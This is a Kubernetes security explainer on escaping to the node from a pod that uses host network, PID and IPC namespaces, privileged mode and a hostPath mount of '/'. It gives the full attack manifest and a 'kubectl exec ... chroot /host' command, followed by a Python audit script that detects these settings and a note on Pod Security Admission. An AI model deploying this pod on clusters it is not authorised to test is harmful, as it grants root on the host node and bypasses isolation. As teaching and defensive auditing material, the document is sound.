Containers normally rely on Linux namespaces on the host system (for example the PID namespace and the network namespace) to get some degree of isolation; the isolation is only partial, because every container still shares the host kernel. If an attacker can deploy a container (see "New container" for more details) without this resource namespacing, the container can use the resources of the host system directly.
An attacker who can deploy a Pod without restrictions can use a manifest like the following to bypass essentially every kind of namespacing: hostNetwork, hostPID and hostIPC place the container in the node's network, PID and IPC namespaces, privileged: true drops the capability, device and seccomp restrictions, and the hostPath volume mounts the node's root file system at /host. The newly created container then behaves as if it were the underlying host system, which, from a technical perspective, it is up to a certain point: it runs in the node's namespaces with full privileges, and only its own mount namespace and root file system still differ, which the /host mount bridges.
apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true   # share the node's network namespace
  hostPID: true       # share the node's PID namespace: see and signal host processes
  hostIPC: true       # share the node's IPC namespace
  containers:
  - name: noderootpod
    image: busybox
    securityContext:
      privileged: true   # all capabilities, host devices, no seccomp/AppArmor confinement
    volumeMounts:
    - mountPath: /host   # the node's root file system, from the hostPath volume below
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]   # keep the container alive for kubectl exec
  volumes:
  - name: noderoot
    hostPath:
      path: /
After deploying the Pod we can verify that we can exec into it and that it gives us access to the underlying host by chrooting into the mounted node root. Note that because the pod shares the node's network namespace, its hostname already matches the node's even before the chroot; a more convincing check is to run ps aux inside the pod, which with hostPID lists the node's processes, or to read files under /host that exist only on the node.
$ kubectl exec -it noderootpod -- chroot /host
/ # hostname
cluster-node-1
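The defender's counterpart of the manifest above, as an added example that is not part of the original page: a small Python audit that walks a PodList (the JSON that kubectl get pods -A -o json prints) and flags the settings the noderootpod manifest relies on, namely host namespaces, privileged containers and hostPath volumes, with a hostPath of the node root called out separately. The function names audit_pod and audit_podlist and the embedded PodList are assumptions constructed for this example, not data from a real cluster.

```python
import json
import posixpath

# Fields that put a container into the node's namespaces instead of its own.
HOST_NAMESPACE_FIELDS = ("hostNetwork", "hostPID", "hostIPC")


def audit_pod(pod: dict) -> list[str]:
    """Return findings for one Pod object (the dict form of a Pod manifest).

    A pod with none of the dangerous settings returns an empty list. Findings cover
    exactly what the noderootpod manifest uses: host namespaces, privileged containers
    and hostPath volumes, with a hostPath of the node root ("/") reported as such.
    """
    spec = pod.get("spec") or {}
    findings = []

    for field in HOST_NAMESPACE_FIELDS:
        if spec.get(field) is True:
            findings.append(f"{field}=true")

    # Map volume name -> normalised host path so mounts can be resolved per container.
    hostpaths = {}
    for vol in spec.get("volumes") or []:
        hp = vol.get("hostPath")
        if hp and "path" in hp:
            hostpaths[vol["name"]] = posixpath.normpath(hp["path"])

    # initContainers and ephemeralContainers can carry the same settings as regular ones.
    containers = (
        (spec.get("containers") or [])
        + (spec.get("initContainers") or [])
        + (spec.get("ephemeralContainers") or [])
    )
    for c in containers:
        sc = c.get("securityContext") or {}
        if sc.get("privileged") is True:
            findings.append(f"container {c['name']}: privileged=true")
        for vm in c.get("volumeMounts") or []:
            path = hostpaths.get(vm["name"])
            if path is None:
                continue
            kind = "host root" if path == "/" else "hostPath"
            findings.append(f"container {c['name']}: {kind} {path} mounted at {vm['mountPath']}")

    return findings


def audit_podlist(podlist_json: str) -> dict[str, list[str]]:
    """Audit a PodList JSON document and return {"namespace/name": findings}
    for every pod that has at least one finding."""
    podlist = json.loads(podlist_json)
    result = {}
    for pod in podlist.get("items") or []:
        md = pod.get("metadata") or {}
        key = f"{md.get('namespace', 'default')}/{md.get('name', '?')}"
        findings = audit_pod(pod)
        if findings:
            result[key] = findings
    return result


# Constructed sample PodList (assumption, hand-written for this example): the
# noderootpod manifest from this page next to a benign pod that only uses an emptyDir.
SAMPLE_PODLIST = json.dumps({
    "apiVersion": "v1",
    "kind": "PodList",
    "items": [
        {
            "apiVersion": "v1", "kind": "Pod",
            "metadata": {"name": "noderootpod", "namespace": "default"},
            "spec": {
                "hostNetwork": True, "hostPID": True, "hostIPC": True,
                "containers": [{
                    "name": "noderootpod", "image": "busybox",
                    "securityContext": {"privileged": True},
                    "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}],
                    "command": ["/bin/sh", "-c", "--"],
                    "args": ["while true; do sleep 30; done;"],
                }],
                "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
            },
        },
        {
            "apiVersion": "v1", "kind": "Pod",
            "metadata": {"name": "web", "namespace": "shop"},
            "spec": {
                "containers": [{
                    "name": "web", "image": "nginx",
                    "securityContext": {"privileged": False},
                    "volumeMounts": [{"mountPath": "/data", "name": "data"}],
                }],
                "volumes": [{"name": "data", "emptyDir": {}}],
            },
        },
    ],
})


if __name__ == "__main__":
    for pod_name, pod_findings in audit_podlist(SAMPLE_PODLIST).items():
        print(pod_name)
        for finding in pod_findings:
            print("  -", finding)
```

On a real cluster, save kubectl get pods -A -o json to a file and pass its contents to audit_podlist. Every setting this audit flags is rejected by the Pod Security Standards at the baseline level, so a namespace that enforces baseline (or restricted) through Pod Security Admission would not admit noderootpod in the first place; the audit is most useful for namespaces where that enforcement is missing or set to warn only.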